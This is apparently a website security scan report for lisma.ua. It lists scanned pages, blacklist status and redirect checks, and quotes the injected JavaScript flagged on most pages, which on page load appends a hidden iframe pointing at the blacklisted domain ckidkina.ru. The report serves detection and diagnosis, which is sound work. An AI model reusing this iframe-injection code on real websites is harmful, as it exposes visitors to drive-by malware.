Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lisma.ua
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lisma.ua/ | 200 OK Content-Length: 23149 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ckidkina.ru
What the excerpt shows: the injected script registers a window load handler that appends an iframe pointing at the blacklisted domain to the last DIV on the page (or to document.body when the page has no DIV), so the third-party content is loaded by the visitor's browser rather than through an HTTP redirect.
Script excerpt: ...[575 bytes skipped]... iframe.setAttribute("frameBorder", "0"); var dels = document.getElementsByTagName("DIV"); if(dels.length == 0){document.body.appendChild(iframe);} else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);} iframe.src = url; return true; } } function gtkhjasd454hfhf235(){ create_frame("http://ckidkina.ru/?id=ifrm"); } try { if(window.attachEvent) { window.attachEvent('onload', gtkhjasd454hfhf235); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); gtkhjasd454hfhf235(); }; window.onload = newonload; } else { window.on ...[78 bytes skipped]...
Decoded script: function gtkhjasd454hfhf235() { create_frame("http://ckidkina.ru/?id=ifrm"); }
http://lisma.ua/ru/profile/registration/ | 200 OK Content-Length: 23535 Content-Type: text/html | clean |
http://lisma.ua/ru/wallpapers/ | 200 OK Content-Length: 29221 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ckidkina.ru ...[575 bytes skipped]... iframe.setAttribute("frameBorder", "0"); var dels = document.getElementsByTagName("DIV"); if(dels.length == 0){document.body.appendChild(iframe);} else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);} iframe.src = url; return true; } } function gtkhjasd454hfhf235(){ create_frame("http://ckidkina.ru/?id=ifrm"); } try { if(window.attachEvent) { window.attachEvent('onload', gtkhjasd454hfhf235); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); gtkhjasd454hfhf235(); }; window.onload = newonload; } else { window.on ...[78 bytes skipped]... Decoded script: function gtkhjasd454hfhf235() { create_frame("http://ckidkina.ru/?id=ifrm"); } | ||
http://lisma.ua/images/wop.js | 200 OK Content-Length: 725 Content-Type: text/javascript | clean |
http://lisma.ua/images/main.js | 200 OK Content-Length: 352 Content-Type: text/javascript | clean |
http://lisma.ua/images/swap.js | 200 OK Content-Length: 1024 Content-Type: text/javascript | clean |
http://lisma.ua/ru/ | 200 OK Content-Length: 23140 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ckidkina.ru ...[575 bytes skipped]... iframe.setAttribute("frameBorder", "0"); var dels = document.getElementsByTagName("DIV"); if(dels.length == 0){document.body.appendChild(iframe);} else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);} iframe.src = url; return true; } } function gtkhjasd454hfhf235(){ create_frame("http://ckidkina.ru/?id=ifrm"); } try { if(window.attachEvent) { window.attachEvent('onload', gtkhjasd454hfhf235); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); gtkhjasd454hfhf235(); }; window.onload = newonload; } else { window.on ...[78 bytes skipped]... Decoded script: function gtkhjasd454hfhf235() { create_frame("http://ckidkina.ru/?id=ifrm"); } | ||
http://lisma.ua/netcat/modules/auth/password_recovery.php | 200 OK Content-Length: 21738 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Script excerpt (cut off mid-expression in this report): var plugin = (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]) ? navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin : 0; if(plugin){ plugin=(parseInt(plugin.description.substring(plugin.description.indexOf(".")-1))>=4); } else if((navigator.userAgent && navigator.userAgent.indexOf("MSIE")>=0)&&((navigator.userAgent.indexOf("Windows 95")>=0)||(navigator.userAgent.indexOf("Windows 98")>=0)||(navigator.userAgent document.write('<EMBED src="/images/logo.swf" menu=false quality=high wmode=transparent WIDTH="200" HEIGHT="100" NAME="alice" ALIGN="" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer">'); document.write('</EMBED></OBJECT>'); } else { document.write('<img src="/images/logo.gif" width="200" height="100" border="0">'); }
Antivirus reports: [the list of detections is not included in this copy of the report]
http://lisma.ua/ru/news/news_11.html | 200 OK Content-Length: 22732 Content-Type: text/html | clean |
http://lisma.ua/ru/lisma/ | 200 OK Content-Length: 32345 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ckidkina.ru ...[575 bytes skipped]... iframe.setAttribute("frameBorder", "0"); var dels = document.getElementsByTagName("DIV"); if(dels.length == 0){document.body.appendChild(iframe);} else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);} iframe.src = url; return true; } } function gtkhjasd454hfhf235(){ create_frame("http://ckidkina.ru/?id=ifrm"); } try { if(window.attachEvent) { window.attachEvent('onload', gtkhjasd454hfhf235); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); gtkhjasd454hfhf235(); }; window.onload = newonload; } else { window.on ...[78 bytes skipped]... Decoded script: function gtkhjasd454hfhf235() { create_frame("http://ckidkina.ru/?id=ifrm"); } | ||
http://lisma.ua/ru/news/ | 200 OK Content-Length: 25507 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ckidkina.ru ...[575 bytes skipped]... iframe.setAttribute("frameBorder", "0"); var dels = document.getElementsByTagName("DIV"); if(dels.length == 0){document.body.appendChild(iframe);} else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);} iframe.src = url; return true; } } function gtkhjasd454hfhf235(){ create_frame("http://ckidkina.ru/?id=ifrm"); } try { if(window.attachEvent) { window.attachEvent('onload', gtkhjasd454hfhf235); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); gtkhjasd454hfhf235(); }; window.onload = newonload; } else { window.on ...[78 bytes skipped]... Decoded script: function gtkhjasd454hfhf235() { create_frame("http://ckidkina.ru/?id=ifrm"); } | ||
http://lisma.ua/ru/all/ | 200 OK Content-Length: 38139 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ckidkina.ru ...[575 bytes skipped]... iframe.setAttribute("frameBorder", "0"); var dels = document.getElementsByTagName("DIV"); if(dels.length == 0){document.body.appendChild(iframe);} else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);} iframe.src = url; return true; } } function gtkhjasd454hfhf235(){ create_frame("http://ckidkina.ru/?id=ifrm"); } try { if(window.attachEvent) { window.attachEvent('onload', gtkhjasd454hfhf235); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); gtkhjasd454hfhf235(); }; window.onload = newonload; } else { window.on ...[78 bytes skipped]... Decoded script: function gtkhjasd454hfhf235() { create_frame("http://ckidkina.ru/?id=ifrm"); } | ||
http://lisma.ua/ru/interesting/ | 200 OK Content-Length: 35335 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ckidkina.ru ...[575 bytes skipped]... iframe.setAttribute("frameBorder", "0"); var dels = document.getElementsByTagName("DIV"); if(dels.length == 0){document.body.appendChild(iframe);} else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);} iframe.src = url; return true; } } function gtkhjasd454hfhf235(){ create_frame("http://ckidkina.ru/?id=ifrm"); } try { if(window.attachEvent) { window.attachEvent('onload', gtkhjasd454hfhf235); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); gtkhjasd454hfhf235(); }; window.onload = newonload; } else { window.on ...[78 bytes skipped]... Decoded script: function gtkhjasd454hfhf235() { create_frame("http://ckidkina.ru/?id=ifrm"); } | ||
http://lisma.ua/ru/action/ | 200 OK Content-Length: 23337 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ckidkina.ru ...[575 bytes skipped]... iframe.setAttribute("frameBorder", "0"); var dels = document.getElementsByTagName("DIV"); if(dels.length == 0){document.body.appendChild(iframe);} else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);} iframe.src = url; return true; } } function gtkhjasd454hfhf235(){ create_frame("http://ckidkina.ru/?id=ifrm"); } try { if(window.attachEvent) { window.attachEvent('onload', gtkhjasd454hfhf235); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); gtkhjasd454hfhf235(); }; window.onload = newonload; } else { window.on ...[78 bytes skipped]... Decoded script: function gtkhjasd454hfhf235() { create_frame("http://ckidkina.ru/?id=ifrm"); } | ||
http://lisma.ua/ru/lismaletters/ | 200 OK Content-Length: 24144 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ckidkina.ru ...[575 bytes skipped]... iframe.setAttribute("frameBorder", "0"); var dels = document.getElementsByTagName("DIV"); if(dels.length == 0){document.body.appendChild(iframe);} else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);} iframe.src = url; return true; } } function gtkhjasd454hfhf235(){ create_frame("http://ckidkina.ru/?id=ifrm"); } try { if(window.attachEvent) { window.attachEvent('onload', gtkhjasd454hfhf235); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); gtkhjasd454hfhf235(); }; window.onload = newonload; } else { window.on ...[78 bytes skipped]... Decoded script: function gtkhjasd454hfhf235() { create_frame("http://ckidkina.ru/?id=ifrm"); } |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lisma.ua
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 09 Oct 2014 03:02:29 GMT
Server: Apache/2.2.15 (CentOS)
Content-Type: text/html; charset=windows-1251
X-Powered-By: PHP/5.3.3
GET / HTTP/1.1
Host: lisma.ua
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 09 Oct 2014 03:02:29 GMT
Server: Apache/2.2.15 (CentOS)
Content-Type: text/html; charset=windows-1251
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: lisma.ua
Referer: http://www.google.com/search?q=lisma.ua
Result:
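The result is similar to the first query. No suspicious redirects were found. Note that this check compares only the server's HTTP responses; the iframe injection listed under "Scanned pages/files" runs in the visitor's browser and would not show up as a redirect.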
GET / HTTP/1.1
Host: lisma.ua
Referer: http://www.google.com/search?q=lisma.ua
Result:
The result is similar to the first query. No suspicious redirects were found.